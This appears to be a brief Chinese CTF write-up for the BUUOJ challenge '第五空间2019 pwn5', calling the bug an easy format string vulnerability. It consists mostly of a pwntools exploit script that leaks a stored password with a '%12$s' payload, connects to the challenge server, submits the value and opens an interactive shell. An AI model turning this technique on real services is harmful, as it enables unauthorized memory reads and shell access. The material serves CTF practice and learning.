0%

第五空间2019pwn5

buuoj刷pwn题之第五空间2019pwn5

白给题,格式化字符串漏洞

upload successful

exp:

from pwn import *

context.terminal = ['gnome-terminal', '-x', 'sh', '-c']

addr = 0x0804C044

pay = '%12$saaa' + p32(addr)
#p = process('./pwn')
p = remote('node3.buuoj.cn', 26394)
p.sendafter(':', pay)

p.recvuntil(',')

passwd = u32(p.recv(4))
print hex(passwd)

#gdb.attach(p)

p.send(str(passwd)+'\x00')

p.interactive()